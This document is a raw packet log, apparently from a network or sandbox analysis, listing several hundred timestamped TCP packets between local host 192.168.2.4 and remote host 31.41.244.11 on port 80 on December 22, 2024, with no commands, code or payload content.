                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.577912092 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.577974081 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.578258991 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.578331947 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.578381062 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.578437090 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.581630945 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.581666946 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.581688881 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.581702948 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.581715107 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.581746101 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.581887007 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.581923962 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.581933975 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.581960917 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.581968069 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.582003117 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.582932949 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.582976103 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.582989931 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.583033085 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.583724976 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.583769083 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.583838940 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.583879948 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.584867001 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.584913969 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.584978104 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.585022926 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.585918903 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.585973024 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.586088896 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.586131096 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.587068081 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.587126970 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.587172985 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.587255955 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.588150978 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.588205099 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.588273048 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.588315964 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.589365005 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.589416981 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.589421988 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.589468002 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.590394020 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.590451002 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.590536118 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.590580940 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.591546059 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.591598988 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.591645956 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.591691017 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.592684984 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.592732906 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.592784882 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.592844963 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.593972921 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.594008923 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.594018936 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.594049931 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.595015049 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.595052004 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.595062971 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.595093966 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.596013069 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.596111059 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.596146107 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.596189022 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.597153902 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.597199917 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.597208023 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.597254038 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.598247051 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.598298073 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.598341942 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.598387957 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.599374056 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.599426985 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.599498034 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.599548101 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.600439072 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.600483894 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.749347925 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.749399900 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.749403954 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.749444008 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.803349972 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.803409100 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.803411007 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.803455114 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.866067886 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.866131067 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.869085073 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.869136095 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.869138956 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.869184017 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.923307896 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.924124002 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.986005068 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.986057043 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.986093998 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.986129999 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.986140013 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.986167908 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.986181021 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.986207962 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.986212969 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.986318111 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.986355066 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.986366987 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.986413002 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.986449003 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.986459017 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.986485004 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.986490011 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.986696959 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.987210035 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.987262011 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.987277985 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.987302065 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.987308025 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.987375021 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.987406015 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.987411976 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.987421989 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.987451077 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.987456083 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.987494946 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.987842083 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.987876892 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.987912893 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.987948895 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.987972021 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.987987041 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.988015890 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.988027096 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.988606930 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.988662958 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.988662958 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.988702059 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.988712072 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.988738060 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.988740921 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.988773108 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.988780975 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.988810062 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.988852978 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.989552021 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.989586115 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.989609957 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.989623070 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.989626884 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.989670992 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.989676952 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.989706993 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.989751101 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.990370035 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.990421057 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.990422010 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.990456104 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.990466118 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.990493059 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.990526915 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.990537882 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.990561962 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.990572929 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.990634918 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.991216898 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.991266012 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.991272926 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.991309881 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.991341114 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.991364956 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.991370916 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.991400957 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.991413116 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.991437912 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.991446018 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.991473913 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.992098093 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.992132902 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.992167950 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.992196083 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.992208004 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.992213011 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.992244959 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.992288113 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.992958069 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.993000031 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.993036032 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.993046045 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.993072033 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.993079901 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.993108034 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.993144035 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.993151903 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.993833065 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.993869066 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.993880987 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.993906021 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.993916035 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.993942022 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.993976116 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.993988037 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.994669914 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.994705915 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.994718075 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.994744062 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.994744062 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.994784117 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.994817972 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.994836092 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.994853973 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.994858980 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.995223045 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.995464087 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.995518923 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.995534897 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.995557070 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.995565891 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.995594025 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.995629072 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.995635033 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.995743990 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.996385098 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.996421099 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.996437073 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.996455908 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.996465921 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.996493101 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.996495008 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.996527910 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.996531010 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.996562958 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.996567965 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.996603012 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.997241020 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.997277975 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.997312069 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.997334003 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.997348070 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.997373104 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.997383118 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.997396946 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.997425079 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.998037100 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.998089075 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.998095036 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.998123884 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.998127937 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.998161077 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.998168945 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.998197079 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.998231888 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.998248100 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.998296976 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.998960972 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.998996973 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.999020100 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.999032974 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.999049902 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.999087095 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.999120951 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.999130964 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.999156952 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.999260902 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.999866962 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.999902964 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.999938011 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.999948978 CET4980480192.168.2.431.41.244.11
